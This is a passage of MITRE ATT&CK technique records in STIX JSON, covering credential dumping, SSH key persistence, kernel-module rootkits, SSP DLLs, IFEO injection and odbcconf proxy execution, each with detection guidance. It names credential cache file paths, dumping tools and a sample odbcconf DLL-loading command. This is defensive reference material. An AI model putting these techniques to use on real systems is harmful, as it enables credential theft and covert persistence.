"macOS", "Linux"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1193", "external_id": "T1193"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/163.html", "external_id": "CAPEC-163"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-18T23:47:54.553Z", "name": "Cached Domain Credentials", "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)\n\nOn Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) \n\nWith SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Ed Williams, Trustwave, SpiderLabs", "Tim (Wadhwa-)Brown", "Yves Yonan"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "created": "2020-02-21T15:42:25.991Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/005", "external_id": "T1003.005"}, {"source_name": "PassLib mscache", "description": "Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.", "url": "https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html"}, {"source_name": "ired mscache", "description": "Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.", "url": "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials"}, {"source_name": "Microsoft - Cached Creds", "description": "Microsoft. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}, {"source_name": "Brining MimiKatz to Unix", "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-03T17:38:21.121Z", "name": "SSH Authorized Keys", "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value \u201cyes\u201d to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI\u2019s \u201cadd-metadata\u201d command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tony Lambert, Red Canary", "Dror Alon, Palo Alto Networks", "Or Kliger, Palo Alto Networks", "Austin Clark, @c2defense", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.\n\nFor network infrastructure devices, collect AAA logging to monitor for rogue SSH keys being added to accounts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "IaaS", "Network"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "created": "2020-06-24T12:42:35.144Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/004", "external_id": "T1098.004"}, {"source_name": "Venafi SSH Key Abuse", "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.", "url": "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities"}, {"source_name": "Google Cloud Privilege Escalation", "description": "Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.", "url": "https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/"}, {"source_name": "cisco_ip_ssh_pubkey_ch_cmd", "description": "Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478"}, {"source_name": "Cybereason Linux Exim Worm", "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.", "url": "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability"}, {"source_name": "Google Cloud Add Metadata", "description": "Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.", "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata"}, {"source_name": "Azure Update Virtual Machines", "description": "Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.", "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update"}, {"source_name": "SSH Authorized Keys", "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.", "url": "https://www.ssh.com/ssh/authorized_keys/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Kernel Modules and Extensions", "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jeremy Galloway", "Red Canary"], "x_mitre_detection": "LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nMany LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0\nThese are typically obtained through the operating systems package manager and installed like a normal package.\n\nAdversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview)\n\nOn Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)\n\nOn RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nLoading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe insmod lsmod rmmod modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1215", "external_id": "T1215"}, {"source_name": "Linux Kernel Programming", "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"}, {"source_name": "Linux Kernel Module Programming Guide", "description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.", "url": "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html"}, {"source_name": "Volatility Phalanx2", "description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.", "url": "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html"}, {"source_name": "CrowdStrike Linux Rootkit", "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"}, {"source_name": "GitHub Reptile", "description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.", "url": "https://github.com/f0rb1dd3n/Reptile"}, {"source_name": "GitHub Diamorphine", "description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.", "url": "https://github.com/m0nad/Diamorphine"}, {"source_name": "iDefense Rootkit Overview", "description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.", "url": "http://www.megasecurity.org/papers/Rootkits.pdf"}, {"source_name": "RSAC 2015 San Francisco Patrick Wardle", "description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Synack Secure Kernel Extension Broken", "description": "Wardle, P. (2017, September 8). High Sierra\u2019s \u2018Secure Kernel Extension Loading\u2019 is Broken. Retrieved April 6, 2018.", "url": "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/"}, {"source_name": "Securelist Ventir", "description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.", "url": "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/"}, {"source_name": "Wikipedia Loadable Kernel Module", "description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.", "url": "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux"}, {"source_name": "Linux Loadable Kernel Module Insert and Remove LKMs", "description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.", "url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Security Support Provider", "description": "Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.\n (Citation: Graeber 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", "created": "2017-05-31T21:31:13.447Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1101", "external_id": "T1101"}, {"source_name": "Graeber 2014", "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"}, {"source_name": "Microsoft Configure LSA", "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Network Security Appliances", "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", "created": "2020-10-02T16:01:35.350Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/006", "external_id": "T1590.006"}, {"source_name": "Nmap Firewalls NIDS", "description": "Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.", "url": "https://nmap.org/book/firewalls.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Image File Execution Options Injection", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Oddvar Moe, @oddvarmoe"], "x_mitre_detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "created": "2020-01-24T15:05:58.384Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/012", "external_id": "T1546.012"}, {"source_name": "Microsoft Dev Blog IFEO Mar 2010", "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.", "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"}, {"source_name": "Microsoft GFlags Mar 2017", "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.", "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview"}, {"source_name": "Microsoft Silent Process Exit NOV 2017", "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.", "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit"}, {"source_name": "Oddvar Moe IFEO APR 2018", "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.", "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"}, {"source_name": "Tilbury 2014", "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "FSecure Hupigon", "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.", "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml"}, {"source_name": "Symantec Ushedix June 2008", "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.", "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Odbcconf", "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "created": "2020-01-24T15:01:32.917Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/008", "external_id": "T1218.008"}, {"source_name": "Microsoft odbcconf.exe", "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.", "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017"}, {"source_name": "LOLBAS Odbcconf", "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"}, {"source_name": "TrendMicro Squiblydoo Aug 2017", "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/"}, {"source_name": "TrendMicro Cobalt Group Nov 2017", "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Search Engines", "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise 